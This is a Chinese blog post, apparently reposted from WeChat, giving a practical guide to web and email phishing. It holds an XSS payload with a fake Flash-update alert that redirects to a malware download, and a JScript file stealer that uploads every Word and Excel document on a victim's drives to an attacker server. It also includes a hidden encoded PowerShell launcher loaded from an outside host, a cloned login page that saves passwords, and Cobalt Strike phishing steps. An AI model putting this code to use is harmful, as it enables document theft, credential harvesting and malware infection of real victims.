这里浅谈的是邮件或者网页钓鱼的进一步思路
对常见的思路做了一个概括和总结
对自己而言呢,发文章写文章也是对自己的学习到的一些东西做一个总结
补充上一篇,一个word捆绑思路
https://www.t00ls.cc/thread-57060-4-1.html
组合前端页面进行钓鱼
Flash钓鱼
1.xss_flash flash钓鱼全套源码
https://github.com/hackxc/xss_flash
2.self-flash钓鱼另一套源码
https://github.com/RomaneeSean/xss-flash-fishing
1.1组合flash钓鱼弹窗版
tools那边来的源码 感觉师傅们很强大
直接进行下载弹窗 把这个源码的js文件扔到xss平台中去 然后直接弹窗即可 在这里插入图片描述
1.2页面跳转思路弹窗下载
思路伪造一个flash主页 然后跳转到flash页面中进行下载免杀马
跳转代码 xss平台模块中进行去定义
window.alert = function(name){var iframe = document.createElement("IFRAME");iframe.style.display="none";iframe.setAttribute("src", 'data:text/plain,');document.documentElement.appendChild(iframe);window.frames[0].window.alert(name);iframe.parentNode.removeChild(iframe);};alert("您的FLASH版本过低,请尝试升级后访问该页面!");window.location.href="钓鱼页面";
自定义代码配置
然后在xss中进行弹窗就好了 点击即可完成一个完整的钓鱼操作
JS文件钓鱼
Js 方式的 IP 定位 逆向追踪溯源访客真实身份 调查取证
https://www.t00ls.cc/viewthread.php?tid=50908&highlight=js
这个是asp的脚本我没搭尝试 不过看源码感觉很不错
JS小偷
服务接受端 Server.php
<?php
if($_SERVER['REQUEST_METHOD'] == 'POST'){
$fileName = uniqid(rand()) . '_' . iconv('utf-8', 'gbk', $_SERVER['HTTP_FILENAME']);
print_r(file_put_contents("uploads/{$fileName}", $HTTP_RAW_POST_DATA));
}
?>
客户浏览器内容端
var __POSTURL__ = 'http://用户的服务器/Server.php';
function UpFile(FilePath, FileName) {
var Stream = new ActiveXObject('ADODB.Stream');
Stream.Type = 1;
Stream.Open();
Stream.LoadFromFile(FilePath);
var XHR = new ActiveXObject('Msxml2.XMLHTTP' || 'Microsoft.XMLHTTP');
XHR.open('POST', __POSTURL__, false);
XHR.setRequestHeader('fileName', FileName);
XHR.setRequestHeader('enctype', 'multipart/form-data');
XHR.send(Stream.Read());
Stream.Close();
return XHR.responseText
}
function GetDriveList() {
var fso = new ActiveXObject("Scripting.FileSystemObject");
var e = new Enumerator(fso.Drives);
var re = [];
for (; ! e.atEnd(); e.moveNext()) {
if (e.item().IsReady) {
re.push(e.item().DriveLetter)
}
}
return re
}
function GetFolderList(folderspec) {
var fso = new ActiveXObject("Scripting.FileSystemObject");
var f = fso.GetFolder(folderspec);
var fc = new Enumerator(f.SubFolders);
var re = [];
for (; ! fc.atEnd(); fc.moveNext()) {
re.push(fc.item())
}
return re
}
function GetFileList(folderspec) {
var fso = new ActiveXObject("Scripting.FileSystemObject");
var f = fso.GetFolder(folderspec);
var fc = new Enumerator(f.files);
var re = [];
for (; ! fc.atEnd(); fc.moveNext()) {
re.push([fc.item(), fc.item().Name])
}
return re
}
function Search(Drive) {
var FolderList = GetFolderList(Drive);
for (var i = 0; i < FolderList.length; i++) {
Search(FolderList[i])
}
var FileList = GetFileList(Drive);
for (var i = 0; i < FileList.length; i++) {
if (/.(doc|docx|xls|xlsx)$/i.test(FileList[i])) {
UpFile(FileList[i][0], FileList[i][1])
}
}
}
function Load() {
var WMIs = GetObject("winmgmts:\\.\root\cimv2");
var Items = WMIs.ExecQuery("SELECT * FROM Win32_Process WHERE Name = 'wscript.exe'");
var i = 0,
rs = new Enumerator(Items);
for (; ! rs.atEnd(); rs.moveNext()) {
i++
}
if (i > 1) WScript.Quit(0);
Items = WMIs = i = rs = null;
var DriveList = GetDriveList();
for (var i = 0; i < DriveList.length; i++) {
Search(DriveList[i] + ":\\")
}
}
Load();
反制思路
典型利用调用ie自身浏览器的时候可以利用
如wirar文件中打开的弹窗广告即是
如果拿到一台dns服务器后把host文件解析的ip换成自己可控服务器的
即winrar的网站解析的换成自己服务器可控的 进而调用ie自身浏览器
实现反制上线
1.js
(function(){
require('child_process').exec('powershell -nop -w hidden -encodedcommand JABXXXXXXXX......');
})();
index.html
<?php
header("X-Powered-By: PHP/<img src=1 οnerrοr=import(unescape('http%3A//192.168.0.198:81/js/1.js'))>");
?>
<head>
<title>SEC TEST</title>
</head>
<body>
</body>
</html>
前端页面伪造钓鱼
前端页面
结合扒网站去伪造一个钓鱼网页即可 然后结合xss跳转代码进行利用攻击即可
伪造一个中交互的沙箱结合xss钓鱼即可实现进阶攻击
常见的扒网站的工具 Save All Resources chrome的插件 Teleport Ultra
<html>
<head></head>
<body>
<form action="login.php" method="post">
<fieldset>
<legend>用户登录</legend>
<ul>
<li> <label>用户名:</label> <input type="text" name="username" /> </li>
<li> <label>密 码:</label> <input type="password" name="password" /> </li>
<li> <label> </label> <input type="submit" name="login" value="登录" /> </li>
</ul>
</fieldset>
</form>
</body>
</html>
login.php文件的页面
<!--?php
//简单处理
header('Content-type:text/html; charset=utf-8'); // 处理用户登录信息
if (isset($_POST['login'])) {
$username = trim($_POST['username']);
$password = trim($_POST['password']);
if (($username != '') || ($password != ''))
{
$myfile = fopen("newfile.txt","w");
$txt = $username." ".$password;
fwrite($myfile,$txt);
fclose($myfile);
}
}
?-->
#其他 常见的逻辑代码类型
<?php
$str1='';
//获得当前的脚本网址
function GetCurUrl()
{
if(!empty($_SERVER["REQUEST_URI"]))
{
$scriptName = $_SERVER["REQUEST_URI"];
$nowurl = $scriptName;
$nowurl=str_replace("/","",$nowurl);//一个是字符串匹配.一个是正则匹配两个的内容是不一样的。
$nowurl=preg_replace("/[a-z,?]*?dq=/","",$nowurl);
}
return $nowurl;
}
$nowurl=GetCurUrl();
$url = $_SERVER["HTTP_REFERER"]; //获取完整的来路URL
$str = str_replace("http://","",$url); //去掉http://
if((strpos($str,'social')!==false))
{
$social=
'替换后的内容'.$str1.'';
$a="/".$nowurl."/";
$social=preg_replace($a,$nowurl.'"class="now',$social);
echo $social;
}
if((strpos($str,'campus')!==false)||(strpos($str,'index')!==false)||(strpos($str,'szzwxq')!==false))
{
$str1=str_replace("social","campus",$str1);
$campus=
'替换后的内容'.$str1.'';
$a="/".$nowurl."/";
$campus=preg_replace($a,$nowurl.'"class="now',$campus);
echo $campus;
}
if((strpos($str,'intern')!==false)||(strpos($str,'index')!==false)||(strpos($str,'xzzwxq')!==false))
{
$str1=str_replace("social","intern",$str1);
$intern=
'替换后的内容'.$str1.'';
$a="/".$nowurl."/";
$intern=preg_replace($a,$nowurl.'"class="now',$intern);
echo $intern;
}
?>
特殊的浏览器漏洞类的钓鱼姿势
Jenkins在钓鱼后门方面的一些姿势
https://www.t00ls.cc/viewthread.php?tid=64071&highlight=%E9%92%93%E9%B1%BC
组合邮箱进行钓鱼
这里以cs为例
如果是网易邮箱,SMTP Host:需要填写smtp.ym.163.com
如果是QQ邮箱,SMTP Host:填写smtp.qq.com
端口均是25
准备条件
①获取一个模板
方法:
1.点击qq的随便一个邮件
2.点击新窗口打开 选择显示邮件原文进行保存或者直接导出eml文件即可
②选择cs的攻击选择邮件钓鱼
进行输入相关的内容
进行输入内容后点击preview即可预览 send即直接发送相关的内容
常常组合页面伪造去钓鱼
原文始发于微信公众号(goddemon的小屋):钓鱼实战2--组合邮件,网页钓鱼
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论